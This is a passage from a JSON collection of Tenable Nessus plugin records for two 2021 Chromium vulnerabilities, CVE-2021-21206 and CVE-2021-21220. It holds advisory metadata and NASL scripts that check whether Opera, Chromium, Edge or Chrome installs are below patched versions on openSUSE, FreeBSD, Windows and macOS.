DNA-92200 [Arm] Create universal packages from two\n buildsets\n\n - DNA-92338 [Search tabs] The preview isn’t updated\n when the tab from another window is closed\n\n - DNA-92410 [Download popup] Selected item still looks bad\n in dark mode\n\n - DNA-92441 Compilation error\n\n - DNA-92514 Allow to generate universal DMG package from\n existing universal .tar.xz\n\n - DNA-92608 Opera 75 crash during rapid workspace\n switching\n\n - DNA-92627 Crash at automation::Error::code()\n\n - DNA-92630 Crash at\n opera::PremiumExtensionPersistentPrefStorageImpl::IsPrem\n iumExtensionFeatureEnabled()\n\n - DNA-92648 Amazon icon disappears from Sidebar Extensions\n section after pressing Hide Amazon button\n\n - DNA-92681 Add missing string in Japanese\n\n - DNA-92684 Fix issues with signing multiple bsids\n\n - DNA-92706 Update repack generation from universal\n packages\n\n - DNA-92725 Enable IPFS for all channels\n\n - The update to chromium 89.0.4389.128 fixes following\n issues: CVE-2021-21206, CVE-2021-21220\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://blogs.opera.com/desktop/changelog-for-76/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected opera package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome versions before 89.0.4389.128 V8 XOR Typer Out-Of-Bounds Access RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:opera\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.2\", reference:\"opera-76.0.4017.94-lp152.2.43.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"opera\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-13T14:37:16", "description": "The version of Microsoft Edge installed on the remote Windows host is prior to 89.0.774.77. It is, therefore, affected by multiple vulnerabilities as referenced in the April 14, 2021 advisory. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-04-15T00:00:00", "type": "nessus", "title": "Microsoft Edge (Chromium) < 89.0.774.77 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21206", "CVE-2021-21220"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/a:microsoft:edge"], "id": "MICROSOFT_EDGE_CHROMIUM_89_0_774_77.NASL", "href": "https://www.tenable.com/plugins/nessus/148565", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(148565);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2021-21206\", \"CVE-2021-21220\");\n script_xref(name:\"IAVA\", value:\"2021-A-0176-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Microsoft Edge (Chromium) < 89.0.774.77 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an web browser installed that is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Microsoft Edge installed on the remote Windows host is prior to 89.0.774.77. It is, therefore, affected\nby multiple vulnerabilities as referenced in the April 14, 2021 advisory. Note that Nessus has not tested for this issue\nbut has instead relied only on the application's self-reported version number.\");\n # https://docs.microsoft.com/en-us/DeployEdge/microsoft-edge-relnotes-security#april-14-2021\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?119280b8\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21206\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21220\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Microsoft Edge version 89.0.774.77 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21220\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome versions before 89.0.4389.128 V8 XOR Typer Out-Of-Bounds Access RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_edge_chromium_installed.nbin\");\n script_require_keys(\"installed_sw/Microsoft Edge (Chromium)\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\nget_kb_item_or_exit('SMB/Registry/Enumerated');\napp_info = vcf::get_app_info(app:'Microsoft Edge (Chromium)', win_local:TRUE);\nconstraints = [\n { 'fixed_version' : '89.0.774.77' }\n];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-13T14:36:17", "description": "Chrome Releases reports :\n\nThis release contains two security fixes :\n\n- [1196781] High CVE-2021-21206: Use after free in Blink. Reported by Anonymous on 2021-04-07\n\n- [1196683] High CVE-2021-21220: Insufficient validation of untrusted input in V8 for x86_64. Reported by Bruno Keith (@bkth_) and Niklas Baumstark (@_niklasb) of Dataflow Security (@dfsec_it) via ZDI (ZDI-CAN-13569) on 2021-04-07>", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-04-15T00:00:00", "type": "nessus", "title": "FreeBSD : chromium -- multiple vulnerabilities (7c0d71a9-9d48-11eb-97a0-e09467587c17)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21206", "CVE-2021-21220"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:chromium", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_7C0D71A99D4811EB97A0E09467587C17.NASL", "href": "https://www.tenable.com/plugins/nessus/148599", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(148599);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2021-21206\", \"CVE-2021-21220\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"FreeBSD : chromium -- multiple vulnerabilities (7c0d71a9-9d48-11eb-97a0-e09467587c17)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Chrome Releases reports :\n\nThis release contains two security fixes :\n\n- [1196781] High CVE-2021-21206: Use after free in Blink. Reported by\nAnonymous on 2021-04-07\n\n- [1196683] High CVE-2021-21220: Insufficient validation of untrusted\ninput in V8 for x86_64. Reported by Bruno Keith (@bkth_) and Niklas\nBaumstark (@_niklasb) of Dataflow Security (@dfsec_it) via ZDI\n(ZDI-CAN-13569) on 2021-04-07>\"\n );\n # https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9531cc08\"\n );\n # https://vuxml.freebsd.org/freebsd/7c0d71a9-9d48-11eb-97a0-e09467587c17.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f83b2ff5\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21220\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome versions before 89.0.4389.128 V8 XOR Typer Out-Of-Bounds Access RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"chromium<89.0.4389.128\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-13T14:36:34", "description": "This update for chromium fixes the following issues :\n\n - Chromium 89.0.4389.128 (boo#1184700) :\n\n - CVE-2021-21206: Use after free in blink\n\n - CVE-2021-21220: Insufficient validation of untrusted input in v8 for x86_64", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-04-19T00:00:00", "type": "nessus", "title": "openSUSE Security Update : chromium (openSUSE-2021-567)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21206", "CVE-2021-21220"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "cpe:/o:novell:opensuse:15.2"], "id": "OPENSUSE-2021-567.NASL", "href": "https://www.tenable.com/plugins/nessus/148746", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2021-567.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(148746);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2021-21206\", \"CVE-2021-21220\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"openSUSE Security Update : chromium (openSUSE-2021-567)\");\n script_summary(english:\"Check for the openSUSE-2021-567 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for chromium fixes the following issues :\n\n - Chromium 89.0.4389.128 (boo#1184700) :\n\n - CVE-2021-21206: Use after free in blink\n\n - CVE-2021-21220: Insufficient validation of untrusted\n input in v8 for x86_64\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1184700\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected chromium packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21220\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome versions before 89.0.4389.128 V8 XOR Typer Out-Of-Bounds Access RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.2\", reference:\"chromedriver-89.0.4389.128-lp152.2.86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"chromedriver-debuginfo-89.0.4389.128-lp152.2.86.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"chromium-89.0.4389.128-lp152.2.86.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"chromium-debuginfo-89.0.4389.128-lp152.2.86.1\", allowmaj:TRUE) ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-13T14:36:34", "description": "The version of Google Chrome installed on the remote Windows host is prior to 89.0.4389.128. It is, therefore, affected by multiple vulnerabilities as referenced in the 2021_04_stable-channel-update-for-desktop advisory. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-04-13T00:00:00", "type": "nessus", "title": "Google Chrome < 89.0.4389.128 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21206", "CVE-2021-21220"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_89_0_4389_128.NASL", "href": "https://www.tenable.com/plugins/nessus/148487", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(148487);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2021-21206\", \"CVE-2021-21220\");\n script_xref(name:\"IAVA\", value:\"2021-A-0176-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Google Chrome < 89.0.4389.128 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is prior to 89.0.4389.128. It is, therefore, affected\nby multiple vulnerabilities as referenced in the 2021_04_stable-channel-update-for-desktop advisory. Note that Nessus\nhas not tested for this issue but has instead relied only on the application's self-reported version number.\");\n # https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9531cc08\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1196781\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1196683\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 89.0.4389.128 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21220\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome versions before 89.0.4389.128 V8 XOR Typer Out-Of-Bounds Access RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('SMB/Google_Chrome/Installed');\ninstalls = get_kb_list('SMB/Google_Chrome/*');\n\ngoogle_chrome_check_version(installs:installs, fix:'89.0.4389.128', severity:SECURITY_WARNING, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-13T14:36:54", "description": "The version of Google Chrome installed on the remote macOS host is prior to 89.0.4389.128. It is, therefore, affected by multiple vulnerabilities as referenced in the 2021_04_stable-channel-update-for-desktop advisory. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-04-13T00:00:00", "type": "nessus", "title": "Google Chrome < 89.0.4389.128 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21206", "CVE-2021-21220"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_89_0_4389_128.NASL", "href": "https://www.tenable.com/plugins/nessus/148488", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(148488);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2021-21206\", \"CVE-2021-21220\");\n script_xref(name:\"IAVA\", value:\"2021-A-0176-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Google Chrome < 89.0.4389.128 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote macOS host is prior to 89.0.4389.128. It is, therefore, affected by\nmultiple vulnerabilities as referenced in the 2021_04_stable-channel-update-for-desktop advisory. Note that Nessus has\nnot tested for this issue but has instead relied only on the application's self-reported version number.\");\n # https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9531cc08\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1196781\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1196683\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 89.0.4389.128 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21220\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome versions before 89.0.4389.128 V8 XOR Typer Out-Of-Bounds Access RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/13\");\n 